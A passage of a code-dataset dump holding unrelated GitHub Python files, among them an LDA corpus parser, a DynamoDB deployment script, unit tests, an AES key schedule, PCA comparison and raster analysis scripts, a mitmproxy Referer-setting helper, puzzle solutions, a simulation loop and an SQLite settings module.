self.TERMS.sort(reverse=True, key=lambda word: word.frequency)\n\n def getDocWordIdFreq(self, docId, wordId):\n word = self.TERMS[wordId]\n docMap = self.DOC_MAPS[docId]\n if word in docMap:\n return docMap[word]\n else:\n return 0\n\n def getDocWordFreq(self, docId, word):\n docMap = self.DOC_MAPS[docId]\n if word in docMap:\n return docMap[word]\n else:\n return 0\n\n def getWordFromIndex(self, index):\n return self.TERMS[index]\n\n def generateLDADataset(self, filename=\"lda_dataset.txt\", numWords=5):\n topWords = self.TERMS[:numWords]\n output = \"\"\n for i in range(len(self.FILE_NAMES)):\n output += f\"{i}\"\n for j, word in enumerate(topWords):\n docFreq = self.getDocWordFreq(i, word.value)\n output += f\" {j + 1}:{docFreq}\"\n output += \"\\n\"\n with open(filename, \"w\") as file:\n file.write(output)\n\n\nclass Word:\n value = \"\"\n frequency = 0\n documentFrequency = 0\n\n def __init__(self, value, frequency, documentFrequency):\n self.value = value\n self.frequency = frequency\n self.documentFrequency = documentFrequency","repo_name":"juleskuehn/comp4601","sub_path":"A2/COMP4601-RS/LDA/corpus_parser.py","file_name":"corpus_parser.py","file_ext":"py","file_size_in_byte":2494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6884563183","text":"# Adds a version entry to deployment table\nimport sys\nimport boto3\nfrom botocore.exceptions import ClientError\nimport os\nimport json\nimport maya\nfrom dynamodb_json import json_util\nfrom decimal import Decimal\n\n\nif __name__ == '__main__':\n import sys\n\n args = sys.argv\n if len(args) >= 3:\n stage = args[1]\n script_number = args[2]\n\n os.environ['STAGE'] = stage\n\n config_filename = 'config.' + stage + '.json'\n parent_dir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\n config_filepath = os.path.join(parent_dir, config_filename)\n\n with open(config_filepath, 'r') as fp:\n config = json.load(fp)\n\n region = config['REGION']\n\n client = boto3.client('dynamodb', region_name=region)\n\n # insert item\n response = client.put_item(\n TableName='sp-deployment',\n Item={\n 'script_number': {\n 'N': str(script_number)\n },\n 'timestamp': {\n 'S': str(maya.now().iso8601())\n },\n 'stage': {\n 'S': str(stage)\n }\n }\n )","repo_name":"EcorRouge/sample-api","sub_path":"deployment_scripts/common/update_version.py","file_name":"update_version.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"15730776040","text":"import unittest\nfrom c3_wordcount_tests_version import count, get_word_counts\n\nclass TestWordcount(unittest.TestCase):\n\n quote = 'Diligence is the mother of good luck.'\n\n text = \"Call me Ishmael. Some years ago—never mind how long precisely—having \\\nlittle or no money in my purse, and nothing particular \\\nto interest me on shore, I thought I would sail about a little and see \\\nthe watery part of the world. It is a way I have of driving off the \\\nspleen and regulating the circulation.\"\n\n def test_count_common_cases(self):\n \"\"\"Test common cases for the count() function.\"\"\"\n self.assertEqual(count(self.quote, 'the'), 2)\n\n def test_get_word_counts_common_cases(self):\n \"\"\"Test common cases for the get_word_counts() function.\"\"\"\n\n## self.assertEqual(get_word_counts(text, 'the', 20), 4 / 15)\n self.assertEqual(get_word_counts(self.text, 'spleen', 20), 1 / 15)\n self.assertEqual(get_word_counts(self.text, 'I', 20), 5 / 15)\n\n def test_get_word_counts_boundary_cases(self):\n \"\"\"Test boundary cases for get_word_counts() function.\"\"\"\n\n # Window length is on boundary of requirement that it be a positive int:\n self.assertEqual(get_word_counts(self.text, 'spleen', 1), 0)\n # Text same size as window length (requirement is len(text) >= window length_\n self.assertEqual(get_word_counts(self.text, 'I', 301), 5 / 1)\n\n def test_get_word_counts_corner_cases(self):\n \"\"\"Test corner cases for get_word_counts() function.\"\"\"\n\n # What if text and word are the same?\n self.assertEqual(get_word_counts('a', 'a', 1), 1)\n\nif __name__ == '__main__':\n unittest.main()\n \n \n","repo_name":"B-T-D/DCS_work_backup","sub_path":"CH7_designing_programs/unittest_module_wordcount_tests.py","file_name":"unittest_module_wordcount_tests.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29575140891","text":"import numpy as np\n\nrctab = [-1] * 500\nMASK8 = (1 << 8) - 1\nMASK32 = (1 << 32) - 1\nKEY_LEN = 128\n\nN = 4 # number of 32 bit words in original key\n\ndef get_words(key, total_bits=32, word_bits=8):\n\tresult = []\t\n\tmask = (1 << word_bits) - 1\n\tfor i in range(total_bits//word_bits):\n\t\tresult.append(key & mask)\n\t\tkey >>= word_bits\n\treturn result[::-1]\n\ndef get_num(words : list[int], word_sz=8) -> int:\n\tresult=0\n\tfor word in words:\n\t\tresult <<= word_sz\n\t\tresult |= word\n\n\treturn result\n\ndef rc(i : int) -> int:\n\tif i == 1: return 1\n\tif rctab[i] != -1: return rctab[i]\n\n\tlast = rc(i-1)\n\tif last < 0x80: \n\t\trctab[i] = (2*last) & MASK8\n\t\treturn rctab[i]\n\t\n\trctab[i] = ((2*last) ^ 0x11B) & MASK8\n\treturn rctab[i]\n\ndef rcon(i : int) -> int:\n\treturn get_num([rc(i),0,0,0])\n\n\ndef subword(x: int, sbox) -> int:\n\twords = get_words(x, 32, 8)\n\twords = [sbox[word] for word in words]\n\treturn get_num(words)\n\ndef rotword(x : int) -> int:\n\twords = np.roll(get_words(x,32,8), -1)\n\treturn get_num(words)\n\n\ndef getkeys(key, rounds, sbox):\n\tkey_words = get_words(key, KEY_LEN, 32)\n\t\n\tfor i in range(N, 4*rounds):\n\t\tlast_w = key_words[i-1]\n\t\told_w = key_words[i-N]\n\t\tif i % N == 0:\n\t\t\tnew_w = subword(rotword(last_w), sbox) ^ rcon(i//N) ^ old_w\n\t\t\tkey_words.append(new_w)\n\t\telif N > 6 and i % N == 4:\n\t\t\tnew_w = old_w ^ subword(last_w,sbox)\n\t\t\tkey_words.append(new_w)\n\t\telse:\n\t\t\tnew_w = old_w ^ last_w\n\t\t\tkey_words.append(new_w)\n\t\n\treturn key_words\n\n\n\t\n\n","repo_name":"RuanPetrus/compsec-02","sub_path":"keyschedule.py","file_name":"keyschedule.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23421991678","text":"#!/usr/bin/env python3\n\"\"\"\nThis compares two sets of {.eigenval, .eigenvec, .eigenvec.var} files, and\nverifies that symmetric absolute percentage error between the two sets is less\nthan the given tolerance. (To avoid spurious test failures due to isolated\nnear-zero values, we only compute a single error statistic on sums of absolute\nvalues, instead of taking means across all samples/PCs.)\n\"\"\"\n\nimport argparse\nimport csv\nimport sys\n\ndef parse_commandline_args():\n \"\"\"\n Standard command-line parser.\n \"\"\"\n parser = argparse.ArgumentParser(description=__doc__)\n requiredarg = parser.add_argument_group('Required Arguments')\n requiredarg.add_argument('-1', '--plink1', type=str, required=True,\n help=\"Filename prefix for plink1 PCA values.\")\n requiredarg.add_argument('-2', '--plink2', type=str, required=True,\n help=\"Filename prefix for plink2 PCA values to validate.\")\n requiredarg.add_argument('-t', '--tolerance', type=float, required=True,\n help=\"Maximum allowed SMAE.\")\n cmd_args = parser.parse_args()\n return cmd_args\n\n\n# See https://stackoverflow.com/questions/5574702/how-to-print-to-stderr-in-python .\ndef eprint(*args):\n print(*args, file=sys.stderr)\n\n\ndef main():\n cmd_args = parse_commandline_args()\n pc_ct = 0\n tol = cmd_args.tolerance\n with open(cmd_args.plink1 + '.eigenval', 'r') as eigval1_file, open(cmd_args.plink2 + '.eigenval', 'r') as eigval2_file:\n absdiff_sum = 0.0\n avgabs_x2_sum = 0.0\n for line1 in eigval1_file:\n line1 = line1.rstrip('\\n')\n eigval1 = float(line1)\n line2 = eigval2_file.readline()\n line2 = line2.rstrip('\\n')\n eigval2 = float(line2)\n absdiff_sum += abs(eigval2 - eigval1)\n avgabs_x2_sum += abs(eigval2) + abs(eigval1)\n pc_ct += 1\n if absdiff_sum > tol * avgabs_x2_sum * 0.5:\n eprint('Eigenvalue mismatch.')\n sys.exit(1)\n with open(cmd_args.plink1 + '.eigenvec', 'r') as eigvec1_file, open(cmd_args.plink2 + '.eigenvec', 'r') as eigvec2_file:\n reader1 = csv.reader(eigvec1_file, delimiter='\\t')\n reader2 = csv.reader(eigvec2_file, delimiter='\\t')\n next(reader1)\n next(reader2)\n absdiff1_sums = [0.0] * pc_ct\n absdiff2_sums = [0.0] * pc_ct\n avgabs_x2_sums = [0.0] * pc_ct\n for row1 in reader1:\n row2 = next(reader2)\n if row1[0] != row2[0] or row1[1] != row2[1]:\n eprint('Sample ID mismatch between .eigenvec files.')\n sys.exit(1)\n row1pc = row1[2:]\n row2pc = row2[2:]\n for pc_idx in range(pc_ct):\n val1 = float(row1pc[pc_idx])\n val2 = float(row2pc[pc_idx])\n absdiff1_sums[pc_idx] += abs(val2 - val1)\n # all signs may be flipped\n absdiff2_sums[pc_idx] += abs(val2 + val1)\n avgabs_x2_sums[pc_idx] += abs(val2) + abs(val1)\n for pc_idx in range(pc_ct):\n if min(absdiff1_sums[pc_idx], absdiff2_sums[pc_idx]) > tol * avgabs_x2_sums[pc_idx] * 0.5:\n eprint('Eigenvector mismatch.')\n sys.exit(1)\n with open(cmd_args.plink1 + '.eigenvec.var', 'r') as varwt1_file, open(cmd_args.plink2 + '.eigenvec.var', 'r') as varwt2_file:\n reader1 = csv.reader(varwt1_file, delimiter='\\t')\n reader2 = csv.reader(varwt2_file, delimiter='\\t')\n next(reader1)\n next(reader2)\n absdiff1_sums = [0.0] * pc_ct\n absdiff2_sums = [0.0] * pc_ct\n avgabs_x2_sums = [0.0] * pc_ct\n for row1 in reader1:\n row2 = next(reader2)\n if row1[0] != row2[0]:\n eprint('Chromosome mismatch between .eigenvec.var files.')\n sys.exit(1)\n if row1[1] != row2[1]:\n eprint('Variant ID mismatch between .eigenvec.var files.')\n sys.exit(1)\n if not (((row1[2] == row2[2]) and (row1[3] == row2[3])) or\n ((row1[2] == row2[3]) and (row1[3] == row2[2]))):\n eprint('Allele mismatch between .eigenvec.var files.')\n sys.exit(1)\n row1pc = row1[4:]\n row2pc = row2[4:]\n for pc_idx in range(pc_ct):\n val1 = float(row1pc[pc_idx])\n val2 = float(row2pc[pc_idx])\n absdiff1_sums[pc_idx] += abs(val2 - val1)\n # all signs may be flipped\n absdiff2_sums[pc_idx] += abs(val2 + val1)\n avgabs_x2_sums[pc_idx] += abs(val2) + abs(val1)\n for pc_idx in range(pc_ct):\n if min(absdiff1_sums[pc_idx], absdiff2_sums[pc_idx]) > tol * avgabs_x2_sums[pc_idx] * 0.5:\n eprint('Variant weight mismatch.')\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"chrchang/plink-ng","sub_path":"2.0/Tests/TEST_PHASED_VCF/pca_compare.py","file_name":"pca_compare.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":366,"dataset":"github-code","pt":"19"} +{"seq_id":"71457547242","text":"import numpy as np\nimport math\nfrom define_functions import*\nfrom input_parameters import*\nlaplacian=1\n\n# time_step=0.1\n# number_measure_points=int(bed_length/(time_step*superficial_velocity))+1 #number of measure points\n# end_time=1\n# space_step=bed_length/number_measure_points\ntime_steps = 100\nnumber_measure_points = 100000\nspace_step = bed_length/number_measure_points # 0.2 mm at 1000 divisions\ntime_step = space_step / superficial_velocity\nprint('time step: ', time_step)\nprint('Length per step: ', space_step)\nprint('Gas velocity: ', superficial_velocity) # 2 mm per s\n\n############### INITIAL CONDITIONS ############################################################ # TODO: Actually for each time t in time steps we want a two dimensional vector in space.\nmoisture_particle = np.zeros(number_measure_points) + moisture_particle_initial\ntemperature_particle = np.zeros(number_measure_points) + temp_initial\nmoisture_gas = np.zeros(number_measure_points) + moisture_gas_initial_in\nmoisture_gas_2 = np.zeros(number_measure_points) + moisture_gas_initial_in \ntemperature_gas = np.zeros(number_measure_points) + temp_initial\n\n############### INITIAL PARAMETERS THAT CHANGE DIRECTLY WITH THE TEMPERATURE ################### # TODO: temperature of the gas? or some mean?\n#moisture_density = np.zeros(number_measure_points)+moisture_density # TODO: for simplifications this will be considered as constant\npressure_saturated = np.zeros(number_measure_points)+pressure_saturated_initial\n\n############### INITIAL PARAMETERS THAT CHANGE INDIRECTLY WITH THE TEMPERATURE #################\nmolar_concentration_moisture = np.zeros(number_measure_points)+molar_concentration_moisture_initial #dep. on moisture_density\nrelative_humidity = np.zeros(number_measure_points) + relative_humidity_gas_inlet #dep. on pressure saturated\npartial_pressure_moisture = np.zeros(number_measure_points)+partial_pressure_moisture_initial #dep. on pressure saturated and RH_gas\n\n################ INITIAL PARAMETERS THAT CHANGE WITH MOISTURE & TEMPERATURE (PARTICLE/GAS)#####\n\nconstant = np.zeros(number_measure_points)+constant_initial #dep. on pressure saturated, k_GP\nk_GP = np.zeros(number_measure_points)+k_GP_initial #dep. on molar_concentration_moisture\n\n############### UPDATE OF PARTICLE PARAMETERS THAT THE GAS HAS YET REACHED #####################\nmoisture_difference_y_absorption=np.zeros(number_measure_points)\nmoisture_gradient_gas=np.zeros(number_measure_points)\nprint('moisture particle initial', moisture_particle)\nprint('moisture_gas_initial', moisture_gas)\n\n# position_gas[k]=k*time_step*superficial_velocity = approximately measure point\n#Y_0+change in moisture = Y_1 --> RH_2\nfor t in range(time_steps):\n at_most_bed_length = min(number_measure_points, t+1)\n for i in range(at_most_bed_length):\n\n ###### SAVE OLD PARAMETERS\n m_p_old = moisture_particle[i]\n t_p_old = temperature_particle[i]\n m_G_old = moisture_gas[i]\n t_G_old = temperature_gas[i]\n\n ###### COMPUTE GRADIENTS AND LAPLACIAN\n # moisture_gradient_gas[i] = compute_gradient(moisture_gas, i, space_step) #TODO: here or after updating? I think here.. \n \n ###### UPDATE MOISTURE PARTICLE\n moisture_particle[i]=compute_moisture_particle(m_p_old, alpha_parameter, N, relative_humidity[i], time_step, constant[i], 1)\n\n ###### UPDATE MOISTURE GAS\n moisture_gas[i+1]=compute_moisture_gas(m_p_old, m_G_old, alpha_parameter, N, relative_humidity[i], time_step, constant[i], gas_velocity, moisture_diffusivity, gradient_moisture_initial, laplacian_moisture_initial, gas_density, particle_density, porosity_powder, 1)\n\n ##### UPDATE TEMP PARTICLE\n temperature_particle[i] = compute_temperature_particle(\n t_p_old, constant[i], time_step, conductivity_particle, laplacian_initial, particle_density, alpha_parameter, \n m_p_old, relative_humidity[i], N, heat_of_vaporization, heat_transfer_coefficient_initial, \n specific_surface_area, t_G_old, particle_heat_capacity, 1)\n \n ##### UPDATE TEMP GAS\n temperature_gas[i] = compute_temperature_gas(\n t_p_old, constant[i], time_step, conductivity_gas, laplacian_initial, gas_density, alpha_parameter, m_G_old, N, \n moisture_vapor_heat_capacity, relative_humidity[i], heat_transfer_coefficient_initial, \n specific_surface_area, t_G_old, gas_heat_capacity, superficial_velocity, temp_gradient_initial, porosity_powder, \n particle_density, 1)\n \n ###### UPDATE PARAMETERS \n #moisture_density[i]=moisture_density[i] #for now since we dont know how the vapor density develops with temp\n pressure_saturated[i]=compute_p_saturated(A, B, temperature_gas[i], C)\n\n # molar_concentration_moisture[i]=moisture_density[i] / molar_mass_moisture\n\n partial_pressure_moisture[i]=compute_partial_pressure_moisture(\n molar_concentration_moisture[i], R_gas_constant, temperature_gas[i]) \n\n relative_humidity[i]=compute_relative_humidity_from_Y(molar_mass_dry_air, molar_mass_moisture, pressure_ambient, moisture_gas[i], pressure_saturated[i])\n\n k_GP[i] = compute_mass_transfer_coefficient(\n moisture_diffusivity, gas_viscosity, column_diameter, porosity_powder, gas_density, particle_density, \n flow_rate, particle_diameter, molar_mass_moisture, superficial_velocity, molar_concentration_moisture[i])[3]\n \n constant[i]=k_GP[i] * specific_surface_area * pressure_saturated[i] / pressure_ambient #TODO: doesn't change for now\n\n #if i % 500 == 1:\n #print ('i: ', i)\n #print('temp particle: ', temperature_particle[i], 'temp_gas', temperature_gas[i])\n # print('moisture particle: ', moisture_particle[i])\n # print('moisture gas: ', moisture_gas[i])\n\n # print('t: ', t)\n # print('moisture-gas gradient', (moisture_gas[i]-m_G_old)/space_step)\n\nprint('Change in temp particles:\\n', (temperature_particle - temp_initial)[0:5])\nprint('Change in temp gas:\\n', (temperature_gas - temp_initial)[0:5])\n\nprint('Change in moisture particles:\\n', (moisture_particle - moisture_particle_initial)[0:5])\nprint('Change in moisture gas:\\n', (moisture_gas - moisture_gas_initial_in)[0:5])\n\n# def compute_RH(superficial_velocity , moisture_diffusivity, gas_density, particle_density, porosity_powder, k_GP, specific_surface_area, pressure_saturated, pressure_ambient, alpha_parameter, N, moisture_particle_i, current_RH_i, measure_points, space_step, time_setp, constant_initial): #current_RH is moisture gas vector TODO: later parameters to compute constant instead of constant initial\n# RH = np.zeros(measure_points)\n# constant=constant_initial # for simplification\n# for i in range(measure_points):\n# diffustion_term=moisture_diffusivity*gas_density*(1-porosity_powder)*compute_laplacian(current_RH, i, space_step)\n# absorption_term=constant*particle_density*porosity_powder/pressure_ambient*(current_RH[i]-compute_equilibrium_moisture(alpha_parameter, moisture_particle[i], N))\n# RH = current_RH[i] + (diffustion_term-absorption_term/(gas_density*(1-porosity_powder)))\n# return RH\n\n################# OLD COMPUTE MOISTURE PARTICLE\n# def compute_moisture_particle(moisture_particle, alpha, N, relative_humidity, dt, constant):\n# change_moisture = constant * (relative_humidity - compute_equilibrium_moisture(alpha, moisture_particle, N))\n# moisture_particle_current = moisture_particle + change_moisture * dt\n# return moisture_particle_current","repo_name":"andreaL14y/Powder-conditioning-column","sub_path":"implicit_version/control_volume_computation_andrea.py","file_name":"control_volume_computation_andrea.py","file_ext":"py","file_size_in_byte":7701,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"21789850398","text":"def ImageHurst(imgpath, outtif):\r\n \"\"\"\r\n 计算影像的hurst指数\r\n :param imgpath: 影像路径,多波段\r\n :param outtif: 输出结果路径\r\n :return: None\r\n \"\"\"\r\n # 读取影像的信息和数据\r\n ds1 = gdal.Open(imgpath)\r\n projinfo = ds1.GetProjection()\r\n geotransform = ds1.GetGeoTransform()\r\n rows = ds1.RasterYSize\r\n colmns = ds1.RasterXSize\r\n data1 = ds1.ReadAsArray()\r\n print(data1.shape)\r\n\r\n src_nodta = ds1.GetRasterBand(1).GetNoDataValue()\r\n\r\n # 创建输出图像\r\n format = \"GTiff\"\r\n driver = gdal.GetDriverByName(format)\r\n dst_ds = driver.Create(outtif, colmns, rows, 1,gdal.GDT_Float32)\r\n dst_ds.SetGeoTransform(geotransform)\r\n dst_ds.SetProjection(projinfo)\r\n\r\n # 删除对象\r\n ds1 = None\r\n\r\n # 开始计算指数\r\n\r\n band1 = data1[0]\r\n out = band1 * 0 - 2222\r\n for row in tqdm(range(rows)):\r\n for col in range(colmns):\r\n if src_nodta is None:\r\n x = data1[:, row, col]\r\n hindex = Hurst(x)\r\n out[row, col] = hindex\r\n else:\r\n if band1[row, col] != src_nodta:\r\n x = data1[:, row, col]\r\n hindex = Hurst(x)\r\n out[row, col] = hindex\r\n # 写出图像\r\n dst_ds.GetRasterBand(1).WriteArray(out)\r\n\r\n # 设置nodata\r\n dst_ds.GetRasterBand(1).SetNoDataValue(-2222)\r\n dst_ds = None","repo_name":"YCG220509/Python","sub_path":"hurst指数计算/Raster_Hurst.py","file_name":"Raster_Hurst.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8995691147","text":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase\n\nfrom nlplib.utils import preprocess_text, sents2wordtag\n\n\nclass TokenizeTokenizeTest(TestCase):\n\n def test_tokenize(self):\n txt = u'''\nBlackfoot, as defined below and described in one or more Service Order Forms executed by Customer and Blackfoot (“Service Orders”).\n'''\n expected_toks = ['Blackfoot', ',', 'as', 'defined', 'below', 'and', 'described', 'in', 'one', 'or', 'more', 'Service', 'Order', 'Forms', 'executed', 'by', 'Customer', 'and', 'Blackfoot', '_LPAR_', '\"', 'Service', 'Orders', '\"', '_RPAR_', '.']\n actual_toks = [tok for tok, tagged in sents2wordtag([preprocess_text(txt)])[0]]\n self.assertEqual(expected_toks, actual_toks)\n","repo_name":"mei-chen/beagle","sub_path":"Dogbone/nlplib/tests/test_tokenize.py","file_name":"test_tokenize.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"72310582444","text":"import cv2\nimport numpy as np\n\nclass EQT_Crop_Converter():\n '''\n Convert 360 EQT frame to several crop\n '''\n\n def __init__(self):\n self.eqt_w = 3840 #原始 EQT 寬度\n self.eqt_h = 1920 #原始 EQT 高度\n self.slice_count = 4\n self.slice_shift = 0\n \n\n \n def setOriginalEQTSize(self, w, h):\n self.eqt_w = w\n self.eqt_h = h\n # print(f\"set size {w}, {h}\")\n\n def setCountAndShift(self, slice_count = 4, slice_shift = 0):\n self.slice_count = slice_count\n self.slice_shift = slice_shift\n\n\n\n def slice(self, frame, slice_count = 4, slice_shift = 0):\n '''\n Slice EQT to several crop\n\n Input:\n - frame: the original frame.\n - slice_count: slice a frame to how many crops.\n - shift: first crop start from which x-index position, and the part before position will concat into the last crop.\n\n Output:\n - crop_outputs: \n '''\n\n # record original EQT size\n self.setOriginalEQTSize(frame.shape[1], frame.shape[0])\n\n slice_width = int(self.eqt_w/slice_count) # width for each slice\n\n if slice_shift > slice_width:\n slice_shift %= slice_width\n \n # record slice info\n self.setCountAndShift(slice_count, slice_shift)\n\n image_y_range = [int(self.eqt_h/4), int(self.eqt_h/4*3)] # only y index in this range has img\n \n\n crop_outputs = []\n\n # slice cubemap\n # crop_img = img[y:y+h, x:x+w]\n for i in range(slice_count):\n x_range = [slice_width*i + slice_shift, slice_width*(i+1) + slice_shift]\n crop_outputs.append(frame[image_y_range[0]:image_y_range[1] , x_range[0]:x_range[1]])\n\n if slice_shift != 0:\n crop_before_shift_position = frame[image_y_range[0]:image_y_range[1], 0:slice_shift]\n crop_outputs[-1] = cv2.hconcat([crop_outputs[-1], crop_before_shift_position])\n\n\n # crop_0 = frame[image_y_range[0]:image_y_range[1] , 0:slice_width]\n # crop_1 = frame[image_y_range[0]:image_y_range[1] , slice_width:slice_width*2]\n # crop_2 = frame[image_y_range[0]:image_y_range[1] , slice_width*2:slice_width*3]\n # crop_3 = frame[image_y_range[0]:image_y_range[1] , slice_width*3:self.eqt_w]\n\n \n # # sequence: left, right\n # crop_outputs = [crop_0, crop_1, crop_2, crop_3]\n\n # save crop images\n for i, crop in enumerate(crop_outputs):\n cv2.imwrite(f'./output/crop-4pic-{i}.jpg', crop)\n\n return crop_outputs\n \n \n def assemble(self, crop_frames):\n '''\n reassemble left & right crop to EQT\n '''\n \n # Validation\n if len(crop_frames) != self.slice_count: \n raise ValueError(f\"crop_frames len should be {self.slice_count}, but only get {len(crop_frames)}\")\n\n # chunk part originally is before shift position\n last_crop = crop_frames[-1]\n print(last_crop.shape[1]-self.slice_shift, last_crop.shape[1])\n crop_before_shift_position = last_crop[0:last_crop.shape[0], last_crop.shape[1]-self.slice_shift:last_crop.shape[1]]\n crop_frames[-1] = last_crop[0:last_crop.shape[0], 0:last_crop.shape[1]-self.slice_shift]\n crop_frames.insert(0, crop_before_shift_position)\n\n # assemble crops\n eqt = cv2.hconcat(crop_frames)\n\n # add black border\n blank_image = np.zeros((int(self.eqt_h/4), self.eqt_w, 3), dtype=np.uint8)\n eqt = cv2.vconcat([blank_image, eqt, blank_image])\n\n return eqt","repo_name":"qmsiteandy/360Convert","sub_path":"eqt_crop_converter.py","file_name":"eqt_crop_converter.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"21954645181","text":"import sys\nimport time\n\nimport libmproxy\nfrom libmproxy import proxy\nfrom libmproxy.proxy import ProxyServer\nfrom selenium import webdriver\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\n\nfrom .refererproxy import RefererMaster\n\nproxy_address = '127.0.0.1'\nproxy_port = 8888\n\n\ndef selenium_proxy():\n proxy_url = '{0}:{1}'.format(proxy_address, proxy_port)\n\n p = Proxy({'proxyType': ProxyType.MANUAL,\n 'httpProxy': proxy_url,\n 'ftpProxy': proxy_url,\n 'sslProxy': proxy_url,\n 'noProxy': 'localhost, 127.0.0.1'})\n\n return p\n\n\ndef main(argv=sys.argv[1:]):\n\n referer = 'http://www.nab.com.au/'\n\n port = proxy_port\n config = proxy.ProxyConfig(port=int(port))\n server = ProxyServer(config=config)\n m = RefererMaster(server, referer)\n m.run_async()\n\n driver = webdriver.Firefox(proxy=selenium_proxy())\n driver.get('https://www.nab.com.au/cgi-bin/ib/301_start.pl?browser=correct')\n try:\n print('Loading complete')\n time.sleep(30)\n print('Shutdown proxy server')\n m.shutdown_async()\n finally:\n driver.quit()\n","repo_name":"markjandrews/pypocs","sub_path":"NABYourBalance/nabmyb/nabmyb.py","file_name":"nabmyb.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35259059690","text":"from pykeen.triples import TriplesFactory\r\nfrom pykeen.pipeline import pipeline\r\n\r\ntf = TriplesFactory.from_path('triail.nt')\r\ntraining, testing = tf.split()\r\nresult = pipeline(\r\n training=training,\r\n testing=testing,\r\n model='TransE',\r\n training_kwargs=dict(num_epochs=5), # short epochs for testing - you should go higher\r\n)\r\nresult.save_to_directory('t1')\r\n","repo_name":"Jeffrey-Sardina/cod-trachtais","sub_path":"my_code/nótaí/Sampla/triail.py","file_name":"triail.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32827186629","text":"from typing import List\n\n\ndef is_tree(pattern: List[str], row: int, col: int) -> bool:\n \"\"\"Checks if the input pattern has a tree at the input coordinates.\"\"\"\n width = len(pattern[0]) \n pat_col = col-col//(width-1)*(width-1) # Turn width into an index\n\n if pattern[row][pat_col] == \"#\":\n return True\n return False\n \n\ndef trees_in_route(pattern: List[str], right: int, down: int) -> int:\n \"\"\"Counts the number of trees in the given path.\"\"\"\n trees = 0\n \n for i, row in enumerate(range(0, len(pattern), down)):\n if is_tree(pattern, row, i*right):\n trees += 1\n \n return trees\n","repo_name":"gustavwilliam/advent-of-code-2020","sub_path":"solutions/day-3.py","file_name":"day-3.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17962203594","text":"class Solution:\n def containsDuplicate(self, nums: List[int]) -> bool:\n\n counted = set(nums)\n\n return len(nums) != len(counted)\n\n\nclass Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n\n num_dict = {}\n\n for i in range(len(nums)):\n if nums[i] not in num_dict:\n num_dict[nums[i]] = (i,)\n else:\n for j in num_dict[nums[i]]:\n if abs(j - i) <= k:\n return True\n num_dict[nums[i]] += (i,)\n\n return False\n","repo_name":"elisading/leetcode","sub_path":"leetcode/arrays/containsDuplicate.py","file_name":"containsDuplicate.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"72714761643","text":"#Packages\nimport sqlite3\nimport re\nimport os\n\nCWD = os.getcwd()\nif r\"\\Project Lip\" not in CWD:\n CWD += r\"/Project Lip\"\nprint(CWD)\nICON_PATH = CWD + r\"/images/notif_icon_test.png\"\n#Establishing connection to database\nglobal_db = CWD + r'/databases/global_vals.db'\ndata_conn = sqlite3.connect(global_db, check_same_thread=False)\ndata_crsr = data_conn.cursor()\n\ndef global_tbl_setup():\n \"\"\"\n This function sets up a database for the global variables to be stored in.\n \"\"\" \n \n generate_global_tbl = f\"\"\"\n CREATE TABLE IF NOT EXISTS global_data (\n attr_name VARCHAR(50),\n val\n );\n \"\"\"\n data_crsr.execute(generate_global_tbl)\n data_conn.commit()\n\ndef get_all_attr_names():\n \"\"\"\n Returns a list containing the name of all attributes currently existing in global_database.\n\n Returns:\n List: a list of Strings for the attributes in global_database.\n \"\"\"\n attr_sql = f'SELECT attr_name FROM global_data'\n data_crsr.execute(attr_sql)\n attr_names = data_crsr.fetchall()\n return [p[0] for p in attr_names]\n\ndef get_global_attr(attr_name):\n \"\"\"\n Get the value of a global attribute whose name is attr_name.\n\n Args:\n attr_name (str): The attribute name whose value needs to be acquired.\n \n Returns:\n Any: the value of that global attribute which the query is made on.\n \"\"\"\n attr_sql = f'SELECT val FROM global_data WHERE attr_name = \"{attr_name}\"'\n data_crsr.execute(attr_sql)\n attr_val = data_crsr.fetchone()\n if attr_val is None:\n return None\n else:\n real_val_repr = attr_val[0]\n if real_val_repr == 'FALSE':\n return False\n elif real_val_repr == 'TRUE':\n return True\n elif type(real_val_repr) is float or type(real_val_repr) is int:\n return real_val_repr\n elif real_val_repr.isdigit():\n return int(real_val_repr)\n else:\n return real_val_repr\n\ndef set_global_attr(attr_name, val):\n \"\"\"\n Sets a global attribute in the database with name attr_name to a value val.\n\n Args:\n attr_name (str): The attribute name whose value is to be set to val.\n val (Any): The new purposed value of the attribute of attr_name.\n \"\"\"\n val = repr(val)\n if get_global_attr(attr_name) is None:\n set_attr_sql = f'INSERT INTO global_data VALUES (\"{attr_name}\", {val})'\n else:\n set_attr_sql = f'''UPDATE global_data \n SET val = {val}\n WHERE attr_name = \"{attr_name}\"\n '''\n data_crsr.execute(set_attr_sql)\n 